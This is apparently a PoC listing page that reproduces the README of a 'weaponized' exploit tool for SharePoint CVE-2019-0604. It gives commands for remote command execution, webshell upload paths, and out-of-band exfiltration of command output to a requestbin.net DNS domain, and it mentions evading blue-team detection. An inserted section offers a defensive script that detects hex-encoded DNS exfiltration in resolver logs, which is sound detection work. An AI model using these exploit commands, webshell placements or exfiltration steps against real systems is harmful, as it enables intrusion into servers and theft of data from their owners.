
CVE-2019-0604 PoC — Microsoft SharePoint Input Validation Error Vulnerability

Associated Vulnerability
Title: Microsoft SharePoint Input Validation Error Vulnerability (CVE-2019-0604)
Description: A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-0594.
Description
Automated tool to exploit sharepoint CVE-2019-0604
Readme
# Weaponized CVE-2019-0604

Automated exploit tool for CVE-2019-0604.

## Requirements

The `requirements.txt` file lists all Python libraries this tool uses; install them with

```
$ pip install -r requirements.txt
```

## Manual blind exploit (with or without credentials)

```
$ python exploit.py -u <url-to-picker.aspx> -c whoami --ntlm -U <uname>:<passwd>
```

## Upload function

Upload anything useful (webshell, recon tool, ...):

```
# Upload cmd.aspx as rcmd.aspx
--file-from /path/to/cmd.aspx --file-to /path/to/web_dir/rcmd.aspx
```

### Directory Mapping

```
Sharepoint Default Web Virtual Dir:
C:\inetpub\wwwroot\wss\VirtualDirectories\80\_app_bin\ -> <target>/_app_bin/
C:\inetpub\wwwroot\wss\VirtualDirectories\80\_vti_pvt\ -> <target>/_vti_pvt/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\layouts\ -> <target>/_layouts/15/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\controltemplates\ -> <target>/_controltemplates/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\identitymodel\login\ -> <target>/_login/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\identitymodel\windows\ -> <target>/_windows/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\wpresources\ -> <target>/_wpresources/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\isapi\ -> <target>/_vti_bin/
```

## Use OOB to get command result

### With the [collaborator_http_api](https://github.com/tree-chtsec/burp-python-plugins) Burp extension

1. Install `collaborator_http_api.py` into Burp Suite (Pro).

2. Make sure Burp Suite is running on the same machine as this exploit.

3. Fire, enjoy the retrieved output :)

```
$ python exploit.py -u <url-to-picker.aspx> -c whoami --collab --ntlm -U <uname>:<passwd>
```

![sharepoint-rce-oob-demo](SHAREPOINT_RCE_OOB.png)

### With a DNS log service such as requestbin.net
```sh
$ python exploit.py -u <url-to-picker.aspx> -r <path/to/reqFile> --oob 8486990041a11aaa43ce.d.requestbin.net -c "whoami /priv"
```

Data received via DNS:
```
2050524956494c4547455320494e464f524d4154494f4e
...
```

Decode it yourself :)
```
 PRIVILEGES INFORMATION
...
```
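The hex strings above arrive as leading DNS labels on queries to the OOB domain, which is also what a defender sees in resolver logs. The following added example (not part of the tool; the log line format is constructed) shows the incident-response side of the same step: scanning DNS query logs for long hex-encoded labels, decoding them, and reassembling the exfiltrated command output per parent domain. It keeps only labels that decode to mostly printable text, so hex-looking but random labels (CDN hashes, the requestbin identifier itself) are not mistaken for data.

```python
import re
from collections import defaultdict

# Constructed sample resolver log (not from the page). The first data label
# is the hex of " PRIVILEGES INFORMATION" exactly as shown in the README;
# the second line carries a follow-up chunk; the last two are benign noise.
SAMPLE_DNS_LOG = """\
2019-03-14T10:02:11Z client=10.0.0.25 query=2050524956494c4547455320494e464f524d4154494f4e.8486990041a11aaa43ce.d.requestbin.net type=A
2019-03-14T10:02:12Z client=10.0.0.25 query=0d0a2d2d2d2d2d2d.8486990041a11aaa43ce.d.requestbin.net type=A
2019-03-14T10:02:13Z client=10.0.0.31 query=www.example.com type=A
2019-03-14T10:02:14Z client=10.0.0.31 query=3f8a9c2e1b7d4f6a0e5c2d9b8a7f6e5d.cdn.example.net type=A
"""

HEX_LABEL = re.compile(r"^(?:[0-9a-fA-F]{2})+$")
MIN_HEX_CHARS = 16      # shorter hex labels are too common in legitimate traffic to flag
MIN_PRINTABLE_RATIO = 0.9


def decode_hex_label(label):
    """Return decoded text if `label` is hex that decodes to mostly printable
    ASCII (i.e. looks like exfiltrated command output), otherwise None."""
    if len(label) < MIN_HEX_CHARS or not HEX_LABEL.match(label):
        return None
    raw = bytes.fromhex(label)
    # Judge printability on the raw bytes: decoding with errors="replace" first
    # would turn high bytes into U+FFFD, which Python counts as printable.
    printable = sum(1 for b in raw if 0x20 <= b < 0x7F or b in (0x09, 0x0A, 0x0D))
    if printable / len(raw) < MIN_PRINTABLE_RATIO:
        return None
    return raw.decode("ascii", errors="replace")


def parse_query(line):
    """Extract the queried name from one log line (constructed `query=` format)."""
    m = re.search(r"query=(\S+)", line)
    return m.group(1).rstrip(".") if m else None


def find_exfil(log_text):
    """Map each OOB parent domain to the reassembled text carried in its
    leading hex labels. Chunks are joined in log order, which assumes the
    resolver logged them in the order they were sent."""
    chunks = defaultdict(list)
    for line in log_text.splitlines():
        qname = parse_query(line)
        if not qname:
            continue
        labels = qname.split(".")
        # Leading labels carry data; stop at the first label that is not
        # printable hex, and treat the rest as the OOB domain.
        decoded = []
        idx = 0
        while idx < len(labels):
            text = decode_hex_label(labels[idx])
            if text is None:
                break
            decoded.append(text)
            idx += 1
        if not decoded:
            continue
        parent = ".".join(labels[idx:])
        chunks[parent].append("".join(decoded))
    return {parent: "".join(parts) for parent, parts in chunks.items()}


if __name__ == "__main__":
    for parent, text in find_exfil(SAMPLE_DNS_LOG).items():
        print(f"[!] hex-encoded data to {parent}:")
        print(text)
```

Running it on the constructed log prints the reconstructed `whoami /priv` header for the requestbin domain and nothing for the benign lines. In a real hunt, feed it your resolver or DNS-firewall export and review every parent domain it reports; long printable-hex labels to a domain the organisation does not own are a strong exfiltration signal regardless of the tool that produced them.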

## TODO
- [x] Argument Parser
- [x] SharePoint, CVE-2019-0604
- [ ] split cmd into multiple parts (in args.cmds)
- [x] specify the binary on demand to avoid detection by the blue team (cmd.exe is currently hardcoded)

## Author
* Tree
File Snapshot

```
[4.0K] /data/pocs/e7b277cd6b4283bbb7bd930f0f9be00a8fd8dcac
├── [3.0K] burpReq.py
├── [9.5K] exploit.py
├── [1.0K] LICENSE
├── [4.0K] oob
│   ├── [1.3K] collab_handler.py
│   ├── [2.1K] decoder.py
│   ├── [   0] __init__.py
│   ├── [1.0K] payload.ps1
│   └── [ 944] sample.json
├── [2.4K] README.md
├── [  34] requirements.txt
├── [3.4K] sharepointkit.py
└── [577K] SHAREPOINT_RCE_OOB.png

1 directory, 12 files
```